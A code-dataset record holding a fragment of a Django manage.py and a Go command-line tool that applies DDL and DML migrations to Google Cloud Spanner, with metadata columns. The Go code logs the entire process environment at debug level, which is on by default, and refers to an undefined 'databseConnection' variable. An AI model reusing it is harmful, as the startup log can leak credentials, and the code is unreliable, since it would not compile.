os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'desafio.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
spanner-migrations/migratex.go | package main
//revive:disable:deep-exit
import (
"bytes"
"context"
"crypto/rand"
"encoding/json"
"errors"
"flag"
"fmt"
"io/ioutil"
"log"
"os"
"os/exec"
"os/signal"
"runtime"
"sort"
"strconv"
"strings"
"syscall"
"time"
"unicode"
"cloud.google.com/go/spanner"
database "cloud.google.com/go/spanner/admin/database/apiv1"
"google.golang.org/api/iterator"
adminpb "google.golang.org/genproto/googleapis/spanner/admin/database/v1"
"google.golang.org/grpc"
"google.golang.org/grpc/codes"
)
type Severity int
const (
red = 31
green = 32
yellow = 33
cyan = 36
colorDebug = green
colorInfo = cyan
colorWarn = yellow
colorError = red
colorFatal = red
SeverityDebug = iota
SeverityInfo = iota
SeverityNotice = iota
SeverityWarning = iota
SeverityError = iota
SeverityEmergency = iota
)
var (
l *logger
envId string
gcpProjectId string
spannerInstanceId string
spannerDatabaseId string
timeout int
)
func init() {
l = newDefaultLogger(true)
flag.StringVar(&envId, "env_id", "", "The environment ID of the spanner instance")
flag.StringVar(&gcpProjectId, "gcp_project_id", "", "The GCP project ID of the spanner instance")
flag.StringVar(&spannerInstanceId, "spanner_instance_id", "", "The ID of the spanner instance")
flag.StringVar(&spannerDatabaseId, "spanner_database_id", "", "The ID of the spanner database")
flag.IntVar(&timeout, "timeout", 60, "The timeout in minutes")
flag.Parse()
}
func main() {
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Minute)
defer cancel()
logDebug(fmt.Sprintf("Starting in env: %v", map[string][]string{"os.Environ()": os.Environ()}))
logDebug(fmt.Sprintf("Checking args"))
if err := checkArgs(); err != nil {
logFatal(fmt.Sprintf("Failed checking required command line arguments: %v", err))
}
logDebug(fmt.Sprintf("Checked args"))
databaseConnection := fmt.Sprintf("projects/%s/instances/%s/databases/%s", gcpProjectId, spannerInstanceId, spannerDatabaseId)
logDebug(fmt.Sprintf("Using envId=%q, gcpProjectId=%q, spannerInstanceId=%q, spannerDatabaseId=%q, databseConnection=%q, timeout=%d", envId, gcpProjectId, spannerInstanceId, spannerDatabaseId, databseConnection, timeout))
workingDir, err := os.Getwd()
if err != nil {
logFatal(fmt.Sprintf("Failed determining working directory: %v", err))
}
logDebug(fmt.Sprintf("Determined working directory %q", workingDir))
logInfo("Beginning migration")
ddl, dml := determineMigrations(workingDir)
if len(ddl) == 0 && len(dml) == 0 {
logInfo(fmt.Sprintf("No migrations found"))
return
}
if len(dml) == 0 {
logInfo(fmt.Sprintf("No DML migrations found, will apply all DDL migrations..."))
applyAllDdlMigrations(workingDir)
return
}
logInfo("DDL and DML migrations found, will determine if any are outstanding...")
spannerClient, spannerAdminClient := newSpannerClient(ctx, databaseConnection)
defer spannerClient.Close()
defer spannerAdminClient.Close()
cleanUpAndExitOnInterrupt([]Closable{spannerClient})
logInfo(fmt.Sprintf("Determining last DDL migration..."))
createMigrationTableIfNecessary(ctx, spannerAdminClient, databaseConnection, "SchemaMigrations")
dirty, lastDdlMigration := determineLastMigration(ctx, spannerClient, "SchemaMigrations")
if dirty {
logFatal(fmt.Sprintf("SchemaMigrations table is dirty, this must be manually fixed before more migrations can be applied"))
}
logInfo(fmt.Sprintf("Determining last DML migration..."))
createMigrationTableIfNecessary(ctx, spannerAdminClient, databaseConnection, "DataMigrations")
dirty, lastDmlMigration := determineLastMigration(ctx, spannerClient, "DataMigrations")
if dirty {
logFatal(fmt.Sprintf("DataMigrations table is dirty, this must be manually fixed before more migrations can be applied"))
}
outstandingDdlMigrations, outstandingDmlMigrations := outstandingMigrations(ddl, dml, lastDdlMigration, lastDmlMigration)
if len(outstandingDdlMigrations)+len(outstandingDmlMigrations) == 0 {
logInfo(fmt.Sprintf("No outstanding migrations found"))
return
}
if len(outstandingDmlMigrations) == 0 {
logInfo(fmt.Sprintf("No outstanding DML migrations found, will apply all DDL migrations..."))
applyAllDdlMigrations(workingDir)
return
}
logInfo("Outstanding DDL and DML migrations found, will apply all interleaved...")
applyAllMigrations(ctx, spannerClient, workingDir, lastDmlMigration, outstandingDdlMigrations, outstandingDmlMigrations)
logInfo("Finished migration")
}
func checkArgs() error {
if envId == "" {
return errors.New("Missing command line argument `env_id`")
} else if gcpProjectId == "" {
return errors.New("Missing command line argument `gcp_project_id`")
} else if spannerInstanceId == "" {
return errors.New("Missing command line argument `spanner_instance_id`")
} else if spannerDatabaseId == "" {
return errors.New("Missing command line argument `spanner_database_id`")
}
return nil
}
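// determineMigrations scans dir and buckets migration files into DDL (*.ddl.up.sql) and
// DML (*.dml.sql files scoped to ".all." or to the current envId).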
func determineMigrations(dir string) (ddl []string, dml []string) {
logInfo(fmt.Sprintf("Determining migrations..."))
files, err := ioutil.ReadDir(dir)
if err != nil {
logFatal(fmt.Sprintf("Failed reading files in directory %q: %v", dir, err))
}
if len(files) == 0 {
logDebug(fmt.Sprintf("Found no files in directory %q", dir))
}
for _, v := range files {
logDebug(fmt.Sprintf("Found file %q", v.Name()))
if strings.HasSuffix(v.Name(), ".ddl.up.sql") {
ddl = append(ddl, v.Name())
} else if strings.HasSuffix(v.Name(), ".all.dml.sql") {
dml = append(dml, v.Name())
} else if strings.HasSuffix(v.Name(), fmt.Sprintf(".%s.dml.sql", envId)) {
dml = append(dml, v.Name())
} else if strings.HasSuffix(v.Name(), ".dml.sql") && strings.Contains(v.Name(), fmt.Sprintf(".%s.", envId)) {
dml = append(dml, v.Name())
}
}
logInfo(fmt.Sprintf("Found '%d' DDL migrations: %v", len(ddl), ddl))
logInfo(fmt.Sprintf("Found '%d' DML migrations: %v", len(dml), dml))
return
}
func applyAllDdlMigrations(dir string) {
cmd := exec.Command("migrate", "-path", dir, "-database", fmt.Sprintf("spanner://projects/%s/instances/%s/databases/%s?x-clean-statements=true", gcpProjectId, spannerInstanceId, spannerDatabaseId), "up")
var outb, errb bytes.Buffer
cmd.Stdout = &outb
cmd.Stderr = &errb
logInfo(fmt.Sprintf("Applying all DDL migrations: %v", cmd.Args))
if err := cmd.Run(); err != nil {
logFatal(fmt.Sprintf("Failed applying all DDL migrations Stdout=%q, Stderr=%q: %v", outb.String(), errb.String(), err))
}
logInfo(fmt.Sprintf("Finished applying all DDL migrations Stdout=%q, Stderr=%q", outb.String(), errb.String()))
}
func applyNextDdlMigration(dir string) {
cmd := exec.Command("migrate", "-path", dir, "-database", fmt.Sprintf("spanner://projects/%s/instances/%s/databases/%s?x-clean-statements=true", gcpProjectId, spannerInstanceId, spannerDatabaseId), "up", "1")
var outb, errb bytes.Buffer
cmd.Stdout = &outb
cmd.Stderr = &errb
logInfo(fmt.Sprintf("Applying next DDL migration: %v", cmd.Args))
if err := cmd.Run(); err != nil {
logFatal(fmt.Sprintf("Failed applying next DDL migration Stdout=%q, Stderr=%q: %v", outb.String(), errb.String(), err))
}
logInfo(fmt.Sprintf("Finished applying next DDL migration Stdout=%q, Stderr=%q", outb.String(), errb.String()))
}
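// determineLastMigration returns the dirty flag and version of the newest row in the
// given migration tracking table, or (false, 0) when the table is empty.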
func determineLastMigration(ctx context.Context, spannerClient *spanner.Client, migrationTableName string) (bool, int64) {
stmt := spanner.Statement{SQL: fmt.Sprintf("SELECT Dirty, Version FROM %s ORDER BY Version DESC LIMIT 1", migrationTableName)}
iter := spannerClient.Single().Query(ctx, stmt)
defer iter.Stop()
for {
row, err := iter.Next()
if err == iterator.Done {
logInfo(fmt.Sprintf("No existing migrations found in table %q: %v", migrationTableName, err))
return false, 0
}
if err != nil {
logFatal(fmt.Sprintf("Failed determining last migration in table %q: %v", migrationTableName, err))
}
var dirty bool
var version int64
if err := row.Columns(&dirty, &version); err != nil {
logFatal(fmt.Sprintf("Failed determining last migration in table %q, could not unpack columns: %v", migrationTableName, err))
}
logInfo(fmt.Sprintf("Last migration in table %q: '%d'", migrationTableName, version))
return dirty, version
}
}
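// outstandingMigrations filters the available DDL/DML migrations down to those with a
// version greater than the last applied one, and fails fast if the two histories are
// inconsistently ordered.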
func outstandingMigrations(availableDdlMigrations, availableDmlMigrations []string, lastDdlMigration, lastDmlMigration int64) (ddl []string, dml []string) {
logInfo(fmt.Sprintf("Determining outstanding DDL and DML migrations..."))
for _, v := range availableDdlMigrations {
if version, err := strconv.ParseInt(strings.Split(v, "_")[0], 10, 64); err == nil {
if version > lastDdlMigration {
if version < lastDmlMigration {
logFatal(fmt.Sprintf("Found inconsistent migration state. Outstanding DDL migration %q should have already been applied since it comes before the current DML migration version '%d'", v, lastDmlMigration))
}
ddl = append(ddl, v)
}
} else {
logFatal(fmt.Sprintf("Failed determining DDL migration version from file name %q: %v", v, err))
}
}
for _, v := range availableDmlMigrations {
if version, err := strconv.ParseInt(strings.Split(v, "_")[0], 10, 64); err == nil {
if version > lastDmlMigration {
if version < lastDdlMigration {
logFatal(fmt.Sprintf("Found inconsistent migration state. Outstanding DML migration %q should have already been applied since it comes before the current DDL migration version '%d'", v, lastDdlMigration))
}
dml = append(dml, v)
}
} else {
logFatal(fmt.Sprintf("Failed determining DML migration version from file name %q: %v", v, err))
}
}
logInfo(fmt.Sprintf("Found '%d' outstanding DDL migrations: %v", len(ddl), ddl))
logInfo(fmt.Sprintf("Found '%d' outstanding DML migrations: %v", len(dml), dml))
return
}
func createMigrationTableIfNecessary(ctx context.Context, spannerAdminClient *database.DatabaseAdminClient, databaseConnection, migrationTableName string) {
logInfo(fmt.Sprintf("Creating table %q if necessary...", migrationTableName))
op, err := spannerAdminClient.UpdateDatabaseDdl(ctx, &adminpb.UpdateDatabaseDdlRequest{
Database: databaseConnection,
Statements: []string{
fmt.Sprintf("CREATE TABLE %s (Version INT64 NOT NULL, Dirty BOOL NOT NULL) PRIMARY KEY (Version)", migrationTableName),
},
})
if err != nil {
logFatal(fmt.Sprintf("Failed creating the %q table: %v", migrationTableName, err))
}
if err := op.Wait(ctx); err != nil {
logDebug(fmt.Sprintf("DDL request returned code=%q, desc=%q", grpc.Code(err), grpc.ErrorDesc(err)))
if grpc.Code(err) == codes.FailedPrecondition && strings.Contains(grpc.ErrorDesc(err), "Duplicate name in schema") && strings.Contains(grpc.ErrorDesc(err), migrationTableName) {
logDebug(fmt.Sprintf("%q table already exists", migrationTableName))
return
}
logFatal(fmt.Sprintf("Failed creating the %q table after waiting: %v", migrationTableName, err))
}
}
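// applyAllMigrations applies the outstanding DDL and DML migrations interleaved in
// version order, delegating DDL steps to the migrate CLI and DML steps to applyDmlMigration.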
func applyAllMigrations(ctx context.Context, spannerClient *spanner.Client, dir string, currentDmlMigrationVersion int64, outstandingDdlMigrations, outstandingDmlMigrations []string) {
logInfo(fmt.Sprintf("Applying all migrations..."))
outstandingMigrations := append(outstandingDdlMigrations, outstandingDmlMigrations...)
sort.Strings(outstandingMigrations)
logInfo(fmt.Sprintf("Applying '%d' outstanding migrations: %v", len(outstandingMigrations), outstandingMigrations))
for _, v := range outstandingMigrations {
logDebug(fmt.Sprintf("Applying outstanding migration %q where current DML migration version is '%d'", v, currentDmlMigrationVersion))
if strings.HasSuffix(v, ".ddl.up.sql") {
applyNextDdlMigration(dir)
} else if strings.HasSuffix(v, ".all.dml.sql") {
currentDmlMigrationVersion = applyDmlMigration(ctx, spannerClient, dir, currentDmlMigrationVersion, v)
} else if strings.HasSuffix(v, fmt.Sprintf(".%s.dml.sql", envId)) {
currentDmlMigrationVersion = applyDmlMigration(ctx, spannerClient, dir, currentDmlMigrationVersion, v)
} else if strings.HasSuffix(v, ".dml.sql") && strings.Contains(v, fmt.Sprintf(".%s.", envId)) {
currentDmlMigrationVersion = applyDmlMigration(ctx, spannerClient, dir, currentDmlMigrationVersion, v)
}
}
}
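// applyDmlMigration reads the DML file, substitutes @key@ placeholders from an optional
// sidecar .json file with the same base name, and executes the statements together with
// the DataMigrations bookkeeping in a single batch.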
func applyDmlMigration(ctx context.Context, spannerClient *spanner.Client, dir string, currentDmlMigrationVersion int64, migration string) int64 {
logInfo(fmt.Sprintf("Appyling next DML migration %q from directory %q", migration, dir))
var nextDmlMigrationVersion int64
var err error
if nextDmlMigrationVersion, err = strconv.ParseInt(strings.Split(migration, "_")[0], 10, 64); err != nil {
logFatal(fmt.Sprintf("Failed determining next DML migration version from file name %q: %v", migration, err))
}
f := fmt.Sprintf("%s/%s", dir, migration)
fileBytes, err := ioutil.ReadFile(f)
if err != nil {
logFatal(fmt.Sprintf("Failed reading DML migration file %q: %v", f, err))
}
migrationFileString := string(fileBytes)
migrationData := make(map[string]string)
tf := fmt.Sprintf("%s/%s", dir, strings.TrimSuffix(migration, ".sql")+".json")
if _, err := os.Stat(tf); os.IsNotExist(err) {
logDebug(fmt.Sprintf("No migration data file %q for DML migration file %q", tf, f))
} else {
fileBytes, err := ioutil.ReadFile(tf)
if err != nil {
logFatal(fmt.Sprintf("Failed reading DML migration data file %q: %v", tf, err))
}
if err := json.Unmarshal(fileBytes, &migrationData); err != nil {
logFatal(fmt.Sprintf("Failed unpacking DML migration data file %q into json: %v", tf, err))
}
}
if len(migrationData) > 0 {
for k, v := range migrationData {
migrationFileString = strings.ReplaceAll(migrationFileString, fmt.Sprintf("@%s@", k), v)
}
}
setDataMigrationsDirty(ctx, spannerClient, nextDmlMigrationVersion)
var statements []spanner.Statement
for _, v := range strings.Split(migrationFileString, ";") {
v = replaceWhiteSpaceWithSpace(strings.TrimSpace(v)) + ";"
if v != ";" {
statements = append(statements, spanner.Statement{SQL: v})
logDebug(fmt.Sprintf("-> Created statement from SQL %q", v))
}
}
statements = append(statements, spanner.Statement{
SQL: "UPDATE DataMigrations SET Dirty=@dirty WHERE Version=@version",
Params: map[string]interface{}{
"dirty": false,
"version": nextDmlMigrationVersion,
},
})
if currentDmlMigrationVersion > 0 {
logInfo(fmt.Sprintf("Prior DML migration version '%d' will be deleted from DML migration tracking table 'DataMigrations'", currentDmlMigrationVersion))
statements = append(statements, spanner.Statement{
SQL: "DELETE FROM DataMigrations WHERE Version=@version",
Params: map[string]interface{}{
"version": currentDmlMigrationVersion,
},
})
} else {
logInfo("No prior DML migration versions need to be deleted from DML migration tracking table 'DataMigrations'")
}
applyDmlStatements(ctx, spannerClient, currentDmlMigrationVersion, nextDmlMigrationVersion, statements)
return nextDmlMigrationVersion
}
func applyDmlStatements(ctx context.Context, spannerClient *spanner.Client, currentDmlMigrationVersion, nextDmlMigrationVersion int64, statements []spanner.Statement) {
logInfo(fmt.Sprintf("Applying DML migrations from version '%d' to version '%d': %v", currentDmlMigrationVersion, nextDmlMigrationVersion, statements))
_, err := spannerClient.ReadWriteTransaction(ctx, func(ctx context.Context, txn *spanner.ReadWriteTransaction) error {
rowCounts, err := txn.BatchUpdate(ctx, statements)
if err != nil {
return err
}
logInfo(fmt.Sprintf("Applied DML migrations from version '%d' to version '%d'. Updated row counts '%d'", currentDmlMigrationVersion, nextDmlMigrationVersion, rowCounts))
return nil
})
if err != nil {
logFatal(fmt.Sprintf("Failed applying DML migrations from version '%d' to version '%d': %v", currentDmlMigrationVersion, nextDmlMigrationVersion, err))
}
}
func setDataMigrationsDirty(ctx context.Context, spannerClient *spanner.Client, version int64) {
logInfo(fmt.Sprintf("Inserting version '%d' in DataMigrations table as dirty", version))
_, err := spannerClient.ReadWriteTransaction(ctx, func(ctx context.Context, txn *spanner.ReadWriteTransaction) error {
stmt := spanner.Statement{
SQL: "INSERT DataMigrations (Dirty, Version) VALUES (@dirty, @version)",
Params: map[string]interface{}{
"dirty": true,
"version": version,
},
}
rowCount, err := txn.Update(ctx, stmt)
if err != nil {
return err
}
logInfo(fmt.Sprintf("Inserted version '%d' in DataMigrations table as dirty. Updated row count '%d'", version, rowCount))
return nil
})
if err != nil {
logFatal(fmt.Sprintf("Failed inserting version '%d' in DataMigrations table as dirty: %v", version, err))
}
}
// SPANNER >--------------------------------------------------
func newSpannerClient(ctx context.Context, databaseConnection string) (*spanner.Client, *database.DatabaseAdminClient) {
logDebug(fmt.Sprintf("Initializing spanner data and admin clients"))
circleciProjectRepoName := os.Getenv("CIRCLE_PROJECT_REPONAME")
circleci := circleciProjectRepoName != ""
var runtimeLabel string
if circleci {
runtimeLabel = fmt.Sprintf("%s-%s", circleciProjectRepoName, os.Getenv("CIRCLE_SHA1")[:7])
} else {
runtimeLabel = os.Getenv("USER")
}
minOpenedSessions := 2
writeSessions := .5
sessionId := strings.ToLower(pseudoUuid())
sessionLocation := runtimeLabel
// If the protocol is not met (https://cloud.google.com/spanner/docs/reference/rpc/google.spanner.v1#session) the following error is generated
// -> spanner: code = "InvalidArgument", desc = "Invalid CreateSession request."
spannerClientConfig := spanner.ClientConfig{
SessionPoolConfig: spanner.SessionPoolConfig{
MinOpened: uint64(minOpenedSessions),
WriteSessions: writeSessions,
},
SessionLabels: map[string]string{
"id": sessionId,
"location": sessionLocation,
},
}
logDebug(fmt.Sprintf("Creating spanner client using connection string %q, minOpenedSessions '%d', sessionId %q, sessionLocation %q", databseConnection, minOpenedSessions, sessionId, sessionLocation))
spannerClient, err := spanner.NewClientWithConfig(ctx, databaseConnection, spannerClientConfig)
if err != nil {
logFatal(fmt.Sprintf("Failed initializing spanner data client for connection %q: %v", databseConnection, err))
}
spannerAdminClient, err := database.NewDatabaseAdminClient(ctx)
if err != nil {
logFatal(fmt.Sprintf("Failed initializing spanner admin client: %v", err))
}
logDebug(fmt.Sprintf("Initialized spanner data and admin clients"))
return spannerClient, spannerAdminClient
}
// SPANNER <--------------------------------------------------
// CLEANUP >--------------------------------------------------
type Closable interface {
Close()
}
func cleanUpAndExitOnInterrupt(closables []Closable) {
c := make(chan os.Signal, 1)
signal.Notify(c, os.Interrupt, syscall.SIGTERM)
go func() {
<-c
logInfo(fmt.Sprintf("Running clean up"))
for _, v := range closables {
v.Close()
}
logInfo(fmt.Sprintf("Cleaned"))
os.Exit(0)
}()
}
// CLEANUP <--------------------------------------------------
// MISC >--------------------------------------------------
func pseudoUuid() (uuid string) {
b := make([]byte, 16)
_, err := rand.Read(b)
if err != nil {
logFatal(fmt.Sprintf("Failed gnerating UUID: %v", err))
return
}
uuid = fmt.Sprintf("%X-%X-%X-%X-%X", b[0:4], b[4:6], b[6:8], b[8:10], b[10:])
return
}
func replaceWhiteSpaceWithSpace(str string) string {
s := strings.Map(func(r rune) rune {
if unicode.IsSpace(r) {
return ' '
}
return r
}, str)
return strings.TrimSpace(strings.Join(strings.Fields(s), " "))
}
// MISC <--------------------------------------------------
// LOGGING >--------------------------------------------------
func newDefaultLogger(debug bool) *logger {
log.SetFlags(log.Flags() &^ (log.Ldate | log.Ltime))
return &logger{
debug: debug,
debugLogger: log.New(os.Stdout, fmt.Sprintf("\x1b[%dmDEBUG ", colorDebug), log.Ldate|log.Ltime|log.Lmicroseconds),
infoLogger: log.New(os.Stdout, fmt.Sprintf("\x1b[%dmINFO ", colorInfo), log.Ldate|log.Ltime|log.Lmicroseconds),
warnLogger: log.New(os.Stderr, fmt.Sprintf("\x1b[%dmWARN ", colorWarn), log.Ldate|log.Ltime|log.Lmicroseconds),
errorLogger: log.New(os.Stderr, fmt.Sprintf("\x1b[%dmERROR ", colorError), log.Ldate|log.Ltime|log.Lmicroseconds),
fatalLogger: log.New(os.Stderr, fmt.Sprintf("\x1b[%dmFATAL ", colorFatal), log.Ldate|log.Ltime|log.Lmicroseconds),
}
}
type logger struct {
debug bool
debugLogger *log.Logger
infoLogger *log.Logger
warnLogger *log.Logger
errorLogger *log.Logger
fatalLogger *log.Logger
}
func logDebug(message string) {
if l.debug {
doLog(SeverityDebug, message)
}
}
func logInfo(message string) {
doLog(SeverityInfo, message)
}
func logNotice(message string) {
doLog(SeverityNotice, message)
}
func logWarn(message string) {
doLog(SeverityWarning, message)
}
func logError(message string) {
doLog(SeverityError, message)
}
func logFatal(message string) {
doLog(SeverityEmergency, message)
}
func doLog(severity Severity, message string) {
pc, fileName, lineNumber, _ := runtime.Caller(2)
line := "line " + strconv.Itoa(lineNumber)
functionName := runtime.FuncForPC(pc).Name()
var logger *log.Logger
switch severity {
case SeverityDebug:
logger = l.debugLogger
case SeverityInfo, SeverityNotice:
logger = l.infoLogger
case SeverityWarning:
logger = l.warnLogger
case SeverityError:
logger = l.errorLogger
case SeverityEmergency:
logger = l.fatalLogger
logger.Panicln(fmtStdLog(message, functionName, line, fileName))
return
default:
logger = l.errorLogger
message = "MISSING LOG LEVEL, USING ERROR => " + message
}
logger.Println(fmtStdLog(message, functionName, line, fileName))
}
func fmtStdLog(message, functionName, line, fileName string) string {
message = fmt.Sprintf("%s %s %s %s", message, functionName, line, fileName)
return fmt.Sprintf("%s\x1b[0m", message)
}
// LOGGING <--------------------------------------------------
| [
"\"CIRCLE_PROJECT_REPONAME\"",
"\"CIRCLE_SHA1\"",
"\"USER\""
]
| []
| [
"CIRCLE_PROJECT_REPONAME",
"USER",
"CIRCLE_SHA1"
]
| [] | ["CIRCLE_PROJECT_REPONAME", "USER", "CIRCLE_SHA1"] | go | 3 | 0 |